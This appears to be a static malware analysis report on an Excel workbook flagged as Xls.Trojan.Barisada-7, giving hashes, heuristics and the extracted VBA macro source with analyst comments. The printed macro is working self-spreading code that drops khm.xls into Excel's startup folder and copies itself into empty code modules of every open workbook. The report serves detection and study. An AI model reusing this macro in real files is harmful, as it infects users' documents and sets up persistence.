Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c88576562a5dee2…

MALICIOUS

Office (OLE)

30.0 KB Created: 2001-07-02 13:02:33 Authoring application: Microsoft Excel First seen: 2012-10-10
MD5: eac28d901d50f18ffef39536d2848bfc SHA-1: f66b03a32bc0ee12c56e0c282f04de1c172bfbe8 SHA-256: 5c88576562a5dee23970fc05baf78e1d585c52bca73982a1b115ae36bc178a4b
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

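The file is identified as malicious by ClamAV with the signature Xls.Trojan.Barisada-7. The VBA macro code attempts to create a new Excel file named 'khm.xls' in the application's startup path, indicating a persistence mechanism (Excel loads workbooks from that folder at launch; compare ATT&CK T1137, Office Application Startup). The same handler also copies the ThisWorkbook code into every empty code module of each open workbook, which is how the macro spreads to other documents; the identical code in the Sheet1 module, and in Sheet2 as far as the preview shows, is consistent with that. The large slack space in the OLE structure is also anomalous, although the only artifact extracted in this report is the macro source and no payload was carved from the slack region.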

Heuristics 2

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 30,720 bytes but its declared streams total only 4,088 bytes — 26,632 bytes (87%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7074 bytes
SHA-256: e3740fafed391648d898e35d9ffe0bd84ad3410d073a3d194daa1c6ac2c85912
Detection
ClamAV: Xls.Trojan.Barisada-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Analyst notes (ThisWorkbook module of the extracted macro source):
' - Three of the four workbook event handlers below are empty stubs.
' - Workbook_WindowDeactivate holds all of the behaviour: it saves a workbook
'   named khm.xls into Application.StartupPath and copies this module's code
'   into empty code modules of every open workbook.
' - The original inline comments are Korean text that is mis-decoded in this
'   dump; they are given here in English translation.
' - Triage indicators visible in this listing: a khm.xls file in the Excel
'   startup folder, and sheet modules that contain Workbook_* handlers.



' Empty handler stub: contains no statements.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

' Empty handler stub: contains no statements.
Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

' Empty handler stub: contains no statements.
Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

' Runs whenever a window of this workbook is deactivated. Performs the
' startup-folder drop and the code copy described in the module notes.
' No "On Error" statement is visible, so any failing call (for example a
' blocked VBProject access) would surface as a runtime error.
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

' Assigned here but never read anywhere in the visible listing.
flag = False
 
' [author, translated] If "khm.xls" is not in the xlstart folder (StartupPath), create it.
' NOTE(review): the Dir() result is stored in "myile", but the test below reads
' "myfile", which is never assigned in this listing. The comparison therefore
' does not depend on whether the file already exists.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   ' Screen redraw is switched off and never switched back on in this listing.
   Application.ScreenUpdating = False
   ' Creates a new workbook and saves it into the startup folder; addtomru:=False
   ' keeps the file out of the recently-used list.
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
' [author, translated] If the ThisWorkbook component has code, store that code in vcode.
' Iterates over every open workbook, which includes the khm.xls just created.
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  ' NOTE(review): "o" is the letter o, an identifier never assigned in this
  ' listing; presumably the digit 0 was intended. When this workbook's
  ' ThisWorkbook module is empty, vcode keeps its value from an earlier pass.
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
' [author, translated] Find components that have no code and insert the value of vcode.
' Every component whose code module has zero lines receives a copy of vcode.
' This step depends on programmatic access to VBProject; on current Office
' versions that needs "Trust access to the VBA project object model" enabled.
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 ' Closes khm.xls with savechanges:=True, so code inserted by the loop above is
 ' written to the startup-folder file. Uses the same never-assigned "myfile" test.
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Analyst notes (Sheet1 module of the extracted macro source):
' - The procedures below are the same text as the ThisWorkbook module in this
'   listing. Workbook_* handlers inside a worksheet module are an indicator
'   that code was copied into an empty module by the AddFromString call below.
' - NOTE(review): in a sheet module these names are presumably not bound to
'   workbook events, so this copy may be inert; confirm in a sandboxed viewer.
' - The original inline comments are Korean text that is mis-decoded in this
'   dump; they are given here in English translation.


' Empty handler stub: contains no statements.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

' Empty handler stub: contains no statements.
Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

' Empty handler stub: contains no statements.
Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

' Saves a workbook named khm.xls into Application.StartupPath, then copies the
' ThisWorkbook code of open workbooks into any code module that has zero lines.
' No "On Error" statement is visible in this procedure.
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

' Assigned here but never read anywhere in the visible listing.
flag = False
 
' [author, translated] If "khm.xls" is not in the xlstart folder (StartupPath), create it.
' NOTE(review): the Dir() result is stored in "myile", but the test below reads
' "myfile", which is never assigned in this listing. The comparison therefore
' does not depend on whether the file already exists.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   ' Screen redraw is switched off and never switched back on in this listing.
   Application.ScreenUpdating = False
   ' Creates a new workbook and saves it into the startup folder; addtomru:=False
   ' keeps the file out of the recently-used list.
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
' [author, translated] If the ThisWorkbook component has code, store that code in vcode.
' Iterates over every open workbook, which includes the khm.xls just created.
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  ' NOTE(review): "o" is the letter o, an identifier never assigned in this
  ' listing; presumably the digit 0 was intended. When this workbook's
  ' ThisWorkbook module is empty, vcode keeps its value from an earlier pass.
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
' [author, translated] Find components that have no code and insert the value of vcode.
' Every component whose code module has zero lines receives a copy of vcode.
' This step depends on programmatic access to VBProject; on current Office
' versions that needs "Trust access to the VBA project object model" enabled.
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 ' Closes khm.xls with savechanges:=True, so code inserted by the loop above is
 ' written to the startup-folder file. Uses the same never-assigned "myfile" test.
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




' Empty handler stub in the Sheet2 module: contains no statements.
' Same text as the stub of this name in the ThisWorkbook module of this listing.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

' Empty handler stub in the Sheet2 module: contains no statements.
' Same text as the stub of this name in the ThisWorkbook module of this listing.
Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

' Empty handler stub in the Sheet2 module: contains no statements.
' Same text as the stub of this name in the ThisWorkbook module of this listing.
Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.Sc
... (truncated)